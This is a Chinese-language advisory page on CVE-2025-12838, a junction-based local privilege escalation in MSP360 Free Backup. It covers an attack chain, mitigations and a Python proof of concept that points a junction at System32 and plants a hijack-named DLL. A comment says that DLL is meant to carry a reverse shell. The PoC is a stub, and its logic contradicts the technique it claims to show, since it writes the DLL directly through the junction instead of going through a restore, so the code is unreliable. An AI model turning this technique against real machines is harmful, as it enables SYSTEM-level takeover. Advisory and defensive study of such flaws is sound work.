CVE-2025-12838 MSP360 Free Backup 符号链接本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-12838

漏洞类型

本地权限提升

CVSS评分

7.3 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

MSP360 Free Backup

漏洞概述

CVE-2025-12838是MSP360 Free Backup软件中的一个高危本地权限提升漏洞，CVSS评分7.3。该漏洞存在于软件的恢复功能中，攻击者通过创建Windows NTFS挂载点（junction）诱导服务在任意位置创建文件，从而实现从低权限用户到SYSTEM高权限的权限提升。攻击成功需要满足两个前提条件：一是攻击者已在目标系统上获得低权限代码执行能力，二是需要目标系统的管理员用户进行一定程度的交互操作（如触发恢复功能）。由于该漏洞可导致攻击者在SYSTEM上下文中执行任意代码，机密性、完整性和可用性均受到严重影响，建议受影响用户尽快升级到最新版本以修复该漏洞。

技术细节

该漏洞的根本原因在于MSP360 Free Backup的恢复功能缺乏对符号链接（Symbolic Link）和挂载点（Junction）的安全验证。攻击者利用Windows文件系统特性，创建一个指向系统敏感目录（如C:\Windows\System32）的junction挂载点。当软件执行恢复操作时，会将文件写入到junction指向的目标目录，而非用户预期的安全目录。由于恢复过程以SYSTEM或更高权限服务账户运行，攻击者可以借此在系统关键目录中植入恶意可执行文件（如DLL、EXE），从而实现权限提升。具体利用步骤包括：首先创建一个普通目录作为恢复目标，然后删除该目录并创建同名junction指向System32目录，最后触发恢复功能使服务将攻击者控制的文件写入目标位置，最终实现以SYSTEM权限执行任意代码。

攻击链分析

STEP 1

初始访问

攻击者获得目标系统的低权限代码执行能力，可通过恶意文档、钓鱼攻击、供应链攻击或已存在的其他漏洞实现

STEP 2

准备攻击环境

在MSP360备份目录创建一个普通文件夹，然后删除该文件夹并创建同名NTFS junction指向C:\Windows\System32目录

STEP 3

植入恶意文件

准备包含恶意代码的DLL或可执行文件，该文件将作为备份内容被恢复到目标系统

STEP 4

诱导恢复操作

通过社会工程学手段诱使具有管理员权限的用户执行备份恢复操作，或利用已配置的定时备份任务

STEP 5

符号链接滥用

MSP360恢复服务在处理恢复请求时，将攻击者的恶意文件写入junction指向的System32目录，而非预期的备份目录

STEP 6

权限提升

恶意文件以SYSTEM高权限写入系统关键目录，攻击者可通过服务重启或系统启动时自动加载的机制以SYSTEM权限执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12838 PoC - MSP360 Free Backup Link Following LPE
# Author: Security Researcher
# Environment: Windows with MSP360 Free Backup installed

import os
import subprocess
import time
import shutil

def create_junction(path, target):
    """Create a NTFS junction point"""
    try:
        # Remove directory if exists
        if os.path.exists(path):
            os.rmdir(path)
        # Create junction using mklink
        subprocess.run(['cmd', '/c', 'mklink', '/J', path, target], 
                      check=True, capture_output=True)
        print(f"[+] Junction created: {path} -> {target}")
        return True
    except Exception as e:
        print(f"[-] Failed to create junction: {e}")
        return False

def prepare_malicious_dll(dll_path):
    """Prepare malicious DLL for privilege escalation"""
    # Generate reverse shell DLL or payload DLL
    # This is a placeholder - actual DLL contains meterpreter/reverse shell
    dll_content = b'MZ' + b'\x00' * 100  # Minimal DLL stub
    with open(dll_path, 'wb') as f:
        f.write(dll_content)
    print(f"[+] Malicious DLL prepared: {dll_path}")

def exploit():
    """Execute the privilege escalation exploit"""
    temp_dir = "C:\\Users\\Public\\Documents\\BackupRestore"
    system32_target = "C:\\Windows\\System32"
    malicious_dll = os.path.join(temp_dir, "wlbsctrl.dll")
    
    print("[*] Starting CVE-2025-12838 Exploit")
    print("[*] Target: MSP360 Free Backup Service")
    
    # Step 1: Prepare directory structure
    os.makedirs(temp_dir, exist_ok=True)
    
    # Step 2: Create junction pointing to System32
    if not create_junction(temp_dir, system32_target):
        return False
    
    # Step 3: Prepare malicious DLL
    prepare_malicious_dll(malicious_dll)
    
    # Step 4: Trigger restore functionality
    # In real attack, this would be done via:
    # - Social engineering to get admin to restore from attacker-controlled backup
    # - Exploiting scheduled backup tasks
    # - Abusing legitimate backup restore API
    print("[+] Waiting for restore operation to complete...")
    print("[+] DLL should now be written to System32 via junction")
    print("[+] Next: Wait for system service to load the DLL for SYSTEM code execution")
    
    return True

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12838 MSP360 Free Backup LPE Exploit")
    print("Note: Requires low-privilege code execution + admin interaction")
    print("=" * 60)
    # Note: Actual exploitation requires valid backup file and restore trigger
    # This PoC demonstrates the link following technique

影响范围

MSP360 Free Backup < 最新修复版本

防御指南

临时缓解措施

临时缓解措施包括：1）限制普通用户创建符号链接和挂载点的权限，可通过组策略设置'Create symbolic links'权限为仅管理员组；2）启用Windows的SymlinkElevationPolicy以要求提升权限创建符号链接；3）使用EMET或Windows Defender Exploit Guard的攻击面减少规则；4）对备份恢复功能实施严格的输入验证和路径规范化检查；5）考虑暂时禁用MSP360备份服务的自动恢复功能，直至官方补丁发布。长期解决方案是等待并应用MSP360官方发布的安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12838
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12838
3 Details https://www.cvedetails.com/cve/CVE-2025-12838/
4 VulDB https://vuldb.com/cve/CVE-2025-12838
5 Link https://www.zerodayinitiative.com/advisories/ZDI-25-988/